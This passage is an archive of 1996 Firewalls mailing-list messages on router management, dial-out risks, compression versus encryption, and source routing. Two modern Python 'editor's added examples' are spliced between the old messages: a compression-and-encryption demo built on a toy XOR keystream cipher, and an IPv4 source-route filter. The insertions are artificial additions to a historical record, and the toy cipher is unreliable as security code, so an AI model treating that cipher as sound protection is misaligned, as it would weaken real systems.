From firewalls-owner Mon Jan 1 11:22:20 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26434 for firewalls-outgoing; Mon, 1 Jan 1996 11:13:40 -0800 (PST)
Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26428 for ; Mon, 1 Jan 1996 11:13:23 -0800 (PST)
Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA25136; Mon, 1 Jan 96 13:14:01 CST
Received: by mnbp.network.com with Microsoft Mail id <30E831CE@mnbp.network.com>; Mon, 01 Jan 96 13:11:10 CST
From: Craig McLellan
To: firewalls, pietro
Subject: Re: Security managing Cisco Routers
Date: Mon, 01 Jan 96 13:10:00 CST
Message-Id: <30E831CE@mnbp.network.com>
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You could use a Network Systems BorderGuard access router placed behind the Ciscos and nail up an encrypted "sleeve" for all management traffic. This would pass through the public network to the remote BorderGuard, then be decrypted and forwarded to the Cisco you wish to manage. Cost is just over $2K US.

RGRDS....clm

| My actual problem is to manage several Cisco Routers situated
| on a public network from a central site, from where there is no
| way to guarantee secure communication.
|
| I can access them using telnet or by using the CiscoWorks
| application (protocols SNMP and TFTP), but still the password
| and the operation are running on the network in a clear form.
|
| In many actual security configurations routers are the elements
| that protect the internal network. Are there any techniques or
| software to protect them and administrative communications with
| them?

You might be able to get an encrypted connection to a network each Cisco is attached to, and then use one of the other authentication methods commented on (Kerberos, TACACS, or RADIUS), or simply have a shorter path to worry about sniffing.

If you bridge off a cheap bastion system running SSH or DESlogin, then you have an encrypted connection to that box, and a bridged connection to the router. (You might also connect this box to a serial port on the router.) This would take roughly one 386 running UNIX, and possibly one bridge per site. Depending on availability of those resources, you could do something like:

    external net
         |
       router        386/UNIX
    internal |          |
    network--[bridge]--+---------+-

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From firewalls-owner Tue Jan 2 00:22:20 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA09784 for firewalls-outgoing; Tue, 2 Jan 1996 00:10:17 -0800 (PST)
Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id AAA09779 for ; Tue, 2 Jan 1996 00:10:10 -0800 (PST)
Received: from lordmuck.itd.uts.edu.au (matt@lordmuck.itd.uts.EDU.AU [138.25.32.20]) by solarnum.itd.uts.edu.au (8.7.1/8.7.1/uts) with ESMTP id QAA12397; Fri, 8 Dec 1995 16:47:49 +1100 (EST)
Received: (from matt@localhost) by lordmuck.itd.uts.edu.au (8.7.1/8.7/Jas) id QAA03786; Fri, 8 Dec 1995 16:52:18 +1100 (EST)
From: Jas (Matthew K)
Message-Id: <199512080552.QAA03786@lordmuck.itd.uts.edu.au>
Subject: Re: Type enforcement vs chroot and buffers
To: mrm@alpharel.com (Mike Murphy)
Date: Fri, 8 Dec 1995 16:52:18 +1100 (EST)
Cc: firewalls@GreatCircle.COM, smith@sctc.com
In-Reply-To: <199512072351.PAA24540@visalia.optigfx.com> from "Mike Murphy" at Dec 7, 95 03:51:25 pm
X-Gcb: -----BEGIN GEEK CODE BLOCK-----
X-Gcb: Version: 3.1
X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) C+++$ UVS++++$ P+++ L+ E++ W++ N++
X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+
X-Gcb: D+ e h- r !y
X-Gcb: ------END GEEK CODE BLOCK------
X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717
X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au
X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K)
X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mike Murphy wrote this...
[...]
> and followed, chroot works. A lot of "if's", sad to say. And too
> bad sockets weren't in filespace.
[...]

Well, in SVR4 sockets are in the filespace (via /dev/tcp, /dev/udp, and libsocket).

Matt
--
#!/bin/sh
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan                    Systems Programmer
Information Technology Division   University of Technology Sydney Australia

It's nice to be in a position where people apologize because they assume
there's humor in your work, based on past experience, but they're not sure
where it is.
-- Rob Pike

From firewalls-owner Tue Jan 2 05:07:20 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA17328 for firewalls-outgoing; Tue, 2 Jan 1996 04:55:11 -0800 (PST)
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA17323 for ; Tue, 2 Jan 1996 04:55:07 -0800 (PST)
From: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com
Received: from alau.al.mt.np.els-gms.att.net by relay2.UU.NET with SMTP id QQzwtv13303; Tue, 2 Jan 1996 07:54:22 -0500 (EST)
Received: from mhs!pfg1 by /C=US/AD=ATTMAIL;Tue Jan 2 12:54:05 -0000 1996
Received: by /C=us/AD=attmail/PD=pfg1;Tue Jan 2 06:50:35 -0600 1996
Date: Tue, 02 Jan 1996 06:50:35 -0600
Transport-Options: /STANDARD/REPORT
Original-Encoding-Types: ASCII
Disclose-Recipients: yes
Subject: Firewalls needed for both dial-in AND dial-out
P2-Originator: mhs!pfg1/G=BECKY/S=HEROLD
To: firewalls@GreatCircle.com, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Message-ID:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm putting together a document listing the risks of not only allowing dial-in access to a networked PC (used for accessing computer systems on a corporate WAN/LAN at least some of the time...typically has a network interface card); but also the risks of allowing dial-out access from a networked PC. I'd appreciate your help, wisdom, and knowledge in critiquing the following regarding the dial-out issues. I apologize if there is a FAQ on this somewhere...I currently do not have very convenient access to the Internet except via e-mail. If you could provide the location of such a FAQ, that'd be great!

First, here are some givens:

* I know any type of remote access is NOT risk-free...that acceptable risks must be determined to allow efficient and effective use of remote access (please no long philosophical discussions of how we can never remove all risks from remote access).
* I know policies need to be established for end-users to follow to help ensure remote access security. (This document will be used to establish buy-in for the policies and educate end-users why the policies are necessary.)
* The environment: Large nation-wide WAN composed of several hundred LANs and running virtually every type of operating system imaginable. 18,000+ users.
* With so many users, it's unlikely that all (or even a large percentage) of them will set up the dial-out access to be STRICTLY dial-out, will keep the modem shut off when not in use (if their modem set-up even allows this), or will know AND UNDERSTAND the risks involved when connecting using TCP/IP.
* Users may need to dial-out to not only the Internet, but also to a vendor or customer, to a BBS, or to services such as Lexis/Nexis, CompuServe, AOL, etc.
* Dial-in access to networked PCs is being controlled through firewalls. (Would like to see dial-out occur through firewalls also.)

So, what are the risks involved with various dial-out methods?

* Networked PC with modem using SLIP/PPP
  - Provides bi-directional access
  - Unauthorized folks (let's call them intruders!) can enter the WAN during the employee's dial-out session
  - Once the intruder enters the WAN he/she can wander around the systems trying to find weaknesses and other entry points
  - Files can be transferred to the dial-out employee's hard-drive
  - Files on the dial-out employee's hard-drive may also be copied, deleted, and possibly modified
  - Files may also be copied to, deleted, or modified on the other WAN systems
  - Viruses and/or trojan horses may be placed on the dial-out employee's hard drive, or on one of the systems on the WAN
  - Changes may be made to WAN systems which could prevent access to the WAN by legitimate WAN users

* Networked PC using communications software (e.g., SmallTalk) with no TCP/IP
  - Fewer risks than PPP/SLIP because of the configurability of the communications software to allow only dial-out (IF the employee remembers to configure the software this way)
  - What would the risks be here???

* Networked PC using a dial-out modem bank (no modem attached to the PC)
  - More secure because of centralized control
  - What would the risks be here???

* Stand-alone (never networked) PC using SLIP/PPP
  - Viruses and trojans can be placed on the dial-out employee's hard drive
  - Any files copied to diskettes and placed on the network could cause problems
  - Employee's PC could be used as a repository

* Stand-alone PC using communications software and no TCP/IP
  - Again, fewer risks because of the communications software
  - What would the risks be here???

Please comment on items I have listed that you believe are NOT risks. Also, please let me know the risks for each type of dial-out PC that I did not have listed. Do you know of other dial-out methods I did not list? If so, what are they, and what are the associated risks?

Thanks in advance for your help!!

Becky
herold.becky@mhs-pfg1.attmail.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The opinions expressed here are strictly my own and do not necessarily
represent those of my employer.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From firewalls-owner Tue Jan 2 05:37:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA18008 for firewalls-outgoing; Tue, 2 Jan 1996 05:26:41 -0800 (PST)
Received: from relay7.UU.NET (relay7.UU.NET [192.48.96.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA17999 for ; Tue, 2 Jan 1996 05:26:35 -0800 (PST)
Received: from rssi.com by relay7.UU.NET with SMTP id QQzwtx08893; Tue, 2 Jan 1996 08:25:49 -0500 (EST)
Received: from mel.rssi.com by rssi.com (SMI-8.6/SMI-SVR4) id IAA24805; Tue, 2 Jan 1996 08:25:25 -0500
Received: by mel.rssi.com (5.x/SMI-SVR4) id AA03193; Tue, 2 Jan 1996 08:21:36 -0500
Date: Tue, 2 Jan 1996 08:21:36 -0500
From: Brad VanOrden
Message-Id: <9601021321.AA03193@mel.rssi.com>
To: ckostick@ashton.csc.com, anton@the-wire.com, firewalls@greatcircle.com
Subject: Re: Compression is useful (was Re: WAN Encryption)
Cc: bvvanor@rssi.rssi.com
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I just wanted to clarify a couple points I was trying to make in my question.

First, I am consulting with a Federal Government body who is placing the main computer used by several hundred users a couple hundred miles away from all the users. Their main objective in the WAN design I am doing for them is to minimize the cost of the WAN (moving the computer to where the users are has already been eliminated). In fact, they have never mentioned security as a concern of theirs.

Being concerned about security, I did not want to present them a plan that did not also include some security considerations. Some of the Government people came up with the idea of using a compression box to reduce the number of required T1s. The box they recommended has V.35 ports, and would sit between the Cisco and the CSU/DSU. To be fair, the vendor told me his box did not do encryption, but since the data was compressed, it would not be in plain view.

I was also looking at an encryption box from WANG. It has AUI ports and would therefore have to go before the CISCO. Thus, my dilemma. If I encrypt before I compress, there won't be much to compress.

I am not an encryption expert. I was trying to get a general feel from the list of the level of difficulty someone would have reading the data if it was only compressed. I think the consensus has been: It will keep the honest person honest, but will not deter a determined hacker.

If someone knows of a device that does encryption as well as compression, I would greatly like to hear it.

Thank You,
Brad Van Orden
Rapid Systems Solutions, Inc
www.rssi.com
410-312-0777

>It began with Brad VanOrden asking:
>>>
>>> I have a question regarding the level of protection I can expect from
>>> compressing traffic before it hits a WAN. That is, the compression
>>> box vendor stated that since the data is compressed, that unless a snooper
>>> has the compression key, the data is also essentially encrypted.
>>>
>>> Do you feel the "compression" encryption is good enough, or should I look
>>> for a better encryption method?
>
>Then Chris Kostick said:
>
>>First of all, compression encryption (even in quotes) is not really a good
>>way of stating it. Nonetheless, I'd say no to this. Simply because if
>>someone has the tools and/or utilities to sniff something off of a network,
>>then the chances are really good that the tool already knows how to
>>uncompress the data stream and read everything. If you want privacy, use
>>encryption.
>
>However I'd like to qualify things on two counts.
>
>Do use compression, please. At the very least it will reduce the
>recurrent patterns in your data stream so that even if you are only
>using weak encryption the BFI decrypter will not be using this advantage.
>This isn't to say you shouldn't use strong encryption, but there may
>be constraints you are working under.
>
>A dictionary based compression algorithm can present problems
>to a receiver who doesn't have the dictionary. Strictly speaking,
>this is a 'coding' scheme. People often confuse 'codes' and 'cyphers'.
>It's not a bullet-proof way of protecting your data but it will deter,
>for example, an automatic sniffer looking for the login-password
>sequence. But then so will XORing your packets with the first chapter
>of DuMaurier's "Rebecca" (As in "The Key to Rebecca").
>
>I view compression like I view The Club. It will deter the casual
>theft. Realistically, you have to do what I was suggesting in an
>earlier thread (cf the archives) and balance the investment in
>protection against the cost and liability of a loss. In short, stop
>thinking like a {programmer,consultant,administrator..} for a moment
>and think like an actuary.
>
>Brad, I presume you are going in to this as a "consultant". Present
>to your client the comparable costs of the different solutions.
>Involve their accountant and lawyers to get input about risk
>and liability. Find out if their insurance covers data loss.
>
>
>Please, please, please, recognise the difference between
>compression and encryption at the LINK level and at the
>NETWORK level. Make sure you use the one appropriate
>for your situation.
>
>/anton

From firewalls-owner Tue Jan 2 05:52:21 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA18711 for firewalls-outgoing; Tue, 2 Jan 1996 05:44:18 -0800 (PST)
Received: from hvar.mzt.hr (hvar.mzt.hr [161.53.4.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA18667 for ; Tue, 2 Jan 1996 05:41:55 -0800 (PST)
Received: from gaus@localhost by hvar.mzt.hr (8.7/8.6.12.CI) id OAA02554; Tue, 2 Jan 1996 14:38:26 +0100 (MET)
From: gaus@znanost.hr (Damir Rajnovic)
Message-Id: <199601021338.OAA02554@hvar.mzt.hr>
Subject: Where to find Endorsed Product List
To: Firewalls@GreatCircle.COM
Date: Tue, 2 Jan 1996 14:38:26 +0100 (MET)
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello there!

Can someone tell me where to find the Endorsed Product List on the Net? I need it for a seminar.

Thanks in advance.

Gaus
|-----------------------------------------------------------------|
| Damir Rajnovic                      | E-mail: gaus@znanost.hr   |
| Ministry of Science and Technology  | Voice: (+385 1)4594 437   |
| Strossmayerov trg 4, 41000 Zagreb   |                           |
|-----------------------------------------------------------------|
| There are no unsolvable problems, but the question is - can you |
| accept the solution.                                            |
|=================================================================|

From firewalls-owner Tue Jan 2 06:07:19 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA18666 for firewalls-outgoing; Tue, 2 Jan 1996 05:40:58 -0800 (PST)
Received: from simtel.Coast.NET (simtel.coast.net [205.149.128.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA18661 for ; Tue, 2 Jan 1996 05:40:51 -0800 (PST)
Received: by simtel.Coast.NET (Smail3.1.28.1 #12) id m0tX6wd-0000sKC; Tue, 2 Jan 96 08:40 EST
Date: Tue, 2 Jan 1996 08:40:03 -0500 (EST)
To: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com
Cc: firewalls@greatcircle.com (Firewalls Mailing List)
Subject: Re: Firewalls needed for both dial-in AND dial-out
In-Reply-To: from "/G=BECKY/S=HEROLD@mhs-pfg1.attmail.com" at Jan 2, 96 06:50:35 am
From: "Mike O'Connor"
Reply-To: "Mike O'Connor"
X-Organization: :noitazinagrO-X
Message-Id: <960102084003.mjo@dojo>
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

:So, what are the risks involved with various dial-out methods?
:* Networked PC with modem using SLIP/PPP
: - Provides bi-directional access
: - Unauthorized folks (let's call them intruders!) can enter the WAN during
: the employee's dial-out session
: - Once the intruder enters the WAN he/she can wander around the systems
: trying to find weaknesses and other entry points
: - Files can be transferred to the dial-out employee's hard-drive
: - Files on the dial-out employee's hard-drive may also be copied, deleted,
: and possibly modified
: - Files may also be copied to, deleted, or modified on the other WAN
: systems
: - Viruses and/or trojan horses may be placed on the dial-out employee's
: hard drive, or on one of the systems on the WAN
: - Changes may be made to WAN systems which could prevent access to the WAN
: by legitimate WAN users

One big danger: Networked PCs may be screwed up by the mixing and matching of IP stacks and clients that this sort of thing implies. Just as one example, one incarnation of C$'s software unobviously munged with WINSOCK.DLL, which caused me lots of grief trying to debug why a system wasn't working properly. The supportability of allowing people to do this needs to be considered.

...Mike
--
Michael J. O'Connor                Internet:  mjo@dojo.mi.org
InterNIC WHOIS:  MJO               http://www.coast.net/~mjo
"Sir, I must protest!  I am not a merry man!"  -Worf

From firewalls-owner Tue Jan 2 07:22:20 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22165 for firewalls-outgoing; Tue, 2 Jan 1996 07:19:41 -0800 (PST)
Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA22160 for ; Tue, 2 Jan 1996 07:19:38 -0800 (PST)
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id JAA21893 for GreatCircle.COM!firewalls; Tue, 2 Jan 1996 09:11:19 -0600 (CST)
Received: by ris1.nmti.com (smail2.5) id AA13022; 2 Jan 96 09:40:12 CST (Tue)
Received: by sonic.nmti.com; id AA27928; Tue, 2 Jan 1996 09:11:15 -0600
From: peter@nmti.com (Peter da Silva)
Message-Id: <9601021511.AA27928@sonic.nmti.com.nmti.com>
Subject: Re: Type enforcement vs chroot and buffers
To: matt@lordmuck.itd.uts.edu.au (Jas)
Date: Tue, 2 Jan 1996 09:11:15 -0600 (CST)
Cc: mrm@alpharel.com, firewalls@GreatCircle.COM, smith@sctc.com
In-Reply-To: <199512080552.QAA03786@lordmuck.itd.uts.edu.au> from "Jas" at Dec 8, 95 04:52:18 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > and followed, chroot works. A lot of "if's", sad to say. And too
> > bad sockets weren't in filespace.

> well in SVR4 sockets are in the filespace (via /dev/tcp, /dev/udp, and
> libsocket)

That's not significantly better in terms of security, since it's all or nothing. To be any use it'd have to be something like "/dev/tcp/25" and so on...
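Editor's added example, following up the compression-versus-encryption thread above (Brad VanOrden's question, with the replies from Chris Kostick and anton); it is not code from any of them or from any list member. It makes the thread's two points concrete in Python: a compressed-only link is readable by anyone who runs the public decompressor, because there is no "compression key", and the order of the two boxes matters, because ciphertext has no redundancy left to compress. The SHA-256 counter keystream, the key and the sample traffic are constructed stand-ins for the demonstration, not the Wang box or any real product.

```python
import hashlib
import zlib

# Constructed sample traffic: a repetitive, text-like stream of the kind a
# login exchange or a log feed produces on a leased line.  Not real data.
SAMPLE_TRAFFIC = (
    b"login: operator\r\nPassword: s3cret-example\r\n"
    b"router> show interfaces\r\n"
) * 40

# Constructed key for the illustrative cipher below.
EXAMPLE_KEY = b"example-link-key"


def keystream_xor(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a SHA-256 counter keystream.

    Stand-in for the link encryptor discussed in the thread: symmetric (apply
    twice to decrypt) and its output looks random, which is all this
    demonstration needs.  It is not a vetted cipher; use a real AEAD
    construction for anything that matters.
    """
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def snoop_compressed_link(wire_bytes: bytes) -> bytes:
    """What a passive observer does with a compressed-but-unencrypted link.

    The algorithm (here zlib/DEFLATE) is public, so decompressing is the
    whole of the observer's work; no key is involved.
    """
    return zlib.decompress(wire_bytes)


def compare_orderings(plaintext: bytes, key: bytes) -> dict:
    """Wire sizes for the two box orderings Brad describes.

    compress-then-encrypt keeps the bandwidth saving; encrypt-then-compress
    loses it, because DEFLATE finds no redundancy in the ciphertext.
    """
    compressed = zlib.compress(plaintext, 9)
    encrypted = keystream_xor(plaintext, key)
    return {
        "plaintext": len(plaintext),
        "compressed_only": len(compressed),
        "compress_then_encrypt": len(keystream_xor(compressed, key)),
        "encrypt_then_compress": len(zlib.compress(encrypted, 9)),
    }


def _decompresses_to(wire_bytes: bytes, secret: bytes) -> bool:
    """True only if zlib can parse the bytes and the secret appears inside."""
    try:
        return secret in zlib.decompress(wire_bytes)
    except zlib.error:
        return False


def confidentiality_check(plaintext: bytes, key: bytes, secret: bytes) -> dict:
    """Does the secret string survive on the wire under each treatment?"""
    compressed_only = zlib.compress(plaintext, 9)
    compress_then_encrypt = keystream_xor(compressed_only, key)
    return {
        # the snooper needs no key to read a compressed link
        "compressed_only_readable": secret in snoop_compressed_link(compressed_only),
        # with encryption on top, zlib cannot even parse the stream
        "compress_then_encrypt_readable": _decompresses_to(compress_then_encrypt, secret),
    }


if __name__ == "__main__":
    print(compare_orderings(SAMPLE_TRAFFIC, EXAMPLE_KEY))
    print(confidentiality_check(SAMPLE_TRAFFIC, EXAMPLE_KEY, b"s3cret-example"))
```

Run it as a script: the first dictionary shows the compressed-then-encrypted stream at the same size as the compressed one and the encrypted-then-compressed stream no smaller than the plaintext, which is Brad's "there won't be much to compress"; the second shows the password string recoverable from the compressed-only link and not from the encrypted one.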
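Editor's added example, placed ahead of the source-routing thread that begins with Ray Hooker's question below and Paul Ferguson's reply; it is not code from either of them or from any list member. It implements the check behind Ray's line "Firewalls should reject source-routed packets": a parser for the IPv4 option list that flags loose (LSRR, option type 131) and strict (SSRR, option type 137) source-route options and fails closed on malformed options. The packet builder, the addresses (documentation ranges) and the zero header checksum are constructed for the demonstration.

```python
import ipaddress
import struct
from typing import Optional

# IPv4 option type codes from RFC 791.
IPOPT_EOL = 0     # end of option list
IPOPT_NOP = 1     # no operation (padding)
IPOPT_LSRR = 131  # loose source and record route
IPOPT_SSRR = 137  # strict source and record route


def ipv4_options(packet: bytes) -> bytes:
    """Return the options field of an IPv4 header (empty when IHL == 5)."""
    if len(packet) < 20:
        raise ValueError("packet shorter than a minimal IPv4 header")
    version = packet[0] >> 4
    ihl = (packet[0] & 0x0F) * 4
    if version != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("malformed IPv4 header")
    return packet[20:ihl]


def source_route_info(packet: bytes) -> Optional[dict]:
    """Walk the option list; describe an LSRR/SSRR option if one is present."""
    opts = ipv4_options(packet)
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == IPOPT_EOL:
            break
        if kind == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("truncated option")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad option length")
        if kind in (IPOPT_LSRR, IPOPT_SSRR):
            if length < 3:
                raise ValueError("source route option without pointer")
            route = opts[i + 3 : i + length]  # type, length, pointer, then addresses
            hops = [
                str(ipaddress.IPv4Address(route[j : j + 4]))
                for j in range(0, len(route) - len(route) % 4, 4)
            ]
            return {
                "kind": "loose" if kind == IPOPT_LSRR else "strict",
                "pointer": opts[i + 2],
                "hops": hops,
            }
        i += length
    return None


def firewall_verdict(packet: bytes) -> str:
    """Policy from the thread: reject source-routed (and unparseable) packets."""
    try:
        info = source_route_info(packet)
    except ValueError as exc:
        return f"drop: {exc}"
    if info is None:
        return "accept"
    return f"drop: {info['kind']} source route via {', '.join(info['hops']) or '(none)'}"


# ---- constructed test packets (documentation address ranges, checksum left 0) ----

def build_packet(src: str, dst: str, options: bytes = b"", payload: bytes = b"") -> bytes:
    """Assemble an IPv4 header carrying the given option bytes."""
    options += b"\x00" * (-len(options) % 4)  # pad to a 32-bit boundary with EOL
    ihl = 5 + len(options) // 4
    if ihl > 15:
        raise ValueError("options longer than 40 bytes")
    header = struct.pack(
        "!BBHHHBBH4s4s",
        (4 << 4) | ihl, 0, 20 + len(options) + len(payload), 0, 0, 64, 6, 0,
        ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed,
    )
    return header + options + payload


def source_route_option(kind: int, hops: list) -> bytes:
    """Encode an LSRR/SSRR option with pointer 4 (first hop not yet visited)."""
    route = b"".join(ipaddress.IPv4Address(h).packed for h in hops)
    return bytes([kind, 3 + len(route), 4]) + route


if __name__ == "__main__":
    plain = build_packet("192.0.2.10", "198.51.100.5")
    lsrr = build_packet("192.0.2.10", "198.51.100.5",
                        source_route_option(IPOPT_LSRR, ["203.0.113.1"]))
    print(firewall_verdict(plain))
    print(firewall_verdict(lsrr))
```

Any raw IPv4 header from a capture can be passed to source_route_info as bytes starting at the version/IHL octet; the verdict function drops both flavours of source route and anything whose option list does not parse, which is the conservative choice for a border device.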
From firewalls-owner Tue Jan 2 09:11:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA24120 for firewalls-outgoing; Tue, 2 Jan 1996 09:00:19 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA24113 for ; Tue, 2 Jan 1996 09:00:14 -0800 (PST) Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id QAA31145 for ; Tue, 2 Jan 1996 16:59:32 GMT Received: from async61.async.duke.edu(152.3.249.61) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaIp8CkR; Tue Jan 2 16:59:29 1996 Received: by async61.async.duke.edu with Microsoft Mail id <01BAD90A.16831660@async61.async.duke.edu>; Tue, 2 Jan 1996 12:01:45 -0500 Message-ID: <01BAD90A.16831660@async61.async.duke.edu> From: Ray Hooker To: "'Firewall Mailing List'" Subject: Source Routing and Disabling Date: Tue, 2 Jan 1996 12:01:32 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know certain things about source routing: - Stated purpose (see RFC 791) was to allow the specification of = routing information to be used by gateways. - I know how to code source routed packets under UNIX (or Linux). - They can be used in attacking TCP/IP hosts (see IPEXT paper on weaknesses in the TCP/IP protocol. - Microsoft's tracert module purportedly has an option to use=20 loose source-routing to debug network problems (this is their version of traceroute). - Some networks configure their routers to reject source-routed = packets. - Firewalls should reject source-routed packets. What I am curious about is what functions or applications, if any, = commonly use source-routing. I haven't noticed any Telnet clients that, = for example, could specify a loose source-routing to contact a = particular host. 
I have searched the Comer series on Internetworking = with TCP/IP and other references, but see little information on actual = usage. Ray Hooker, rayhook@ibm.net Secure I/T Inc. 1-919-544-4565 From firewalls-owner Tue Jan 2 09:52:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA25576 for firewalls-outgoing; Tue, 2 Jan 1996 09:46:52 -0800 (PST) Received: from warp10.smartlink.net (smartlink.net [204.118.4.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA25571 for ; Tue, 2 Jan 1996 09:46:45 -0800 (PST) Received: by warp10.smartlink.net(8.6.12/SMARTLINK-1.0) with id JAA06359 for on Tue, 2 Jan 1996 09:47:21 -0800 Date: Tue, 2 Jan 1996 09:47:20 -0800 (PST) From: Pablo To: firewalls@greatcircle.com Subject: ipx-bridging & ip-routing Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I am working on a problem in which I need some sort of unix box ( linux/bsd ? ) to do ip-routing ( no problem there, i know ), & do ipx-bridging. The second part is the problem area. Coming into & going out of the box will be 100 mbps FDDI. I have set up a linux box and put ipfwadmin & ipxbridge & ipxripd ( mostly from sunsite ) on it, and it seems like it will work ok for ipx bridging, but it seems like it will be far to ineffecient to handle traffic from 300+ users @ 100mbps. vinod@cse.iitb.ernet.in says in the documentation on ipx-bridge that he is currently using ipx-bridge to connect two networks, i'm not sure how large the networks are. I was hoping someone out there would have some comments or ideas on what to use to ROUTE ip packets with good control, and bridge ipx-packets as fast as possible. I can use a dedicated box for the routing, or even one of the cisco products if need be, I just need to know the best way to go. Any insight would be greatly appreciated. Thanks in advance! 
paul From firewalls-owner Tue Jan 2 10:22:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA26387 for firewalls-outgoing; Tue, 2 Jan 1996 10:09:41 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA26382 for ; Tue, 2 Jan 1996 10:09:37 -0800 (PST) Received: from pferguso-pc.cisco.com (c4robo4.cisco.com [171.68.13.74]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id KAA22829; Tue, 2 Jan 1996 10:07:55 -0800 Message-Id: <199601021807.KAA22829@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jan 1996 13:08:22 -0500 To: Ray Hooker From: Paul Ferguson Subject: Re: Source Routing and Disabling Cc: "'Firewall Mailing List'" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A common application for loose source-routing, used mainly by service providers, is troubleshooting routing problems in the Internet. It can be quite helpful to trace a route *from* a specified node, *to* a specified node. Of course, this doesn't mean that you should allow loose source-routed traffic into your internal network from external sources, however, many service providers allow source-routed traffic transit on their backbones for specifically this purpose. - paul At 12:01 PM 1/2/96 -0500, Ray Hooker wrote: >I know certain things about source routing: > - Stated purpose (see RFC 791) was to allow the specification of routing > information to be used by gateways. > - I know how to code source routed packets under UNIX (or Linux). > - They can be used in attacking TCP/IP hosts (see IPEXT 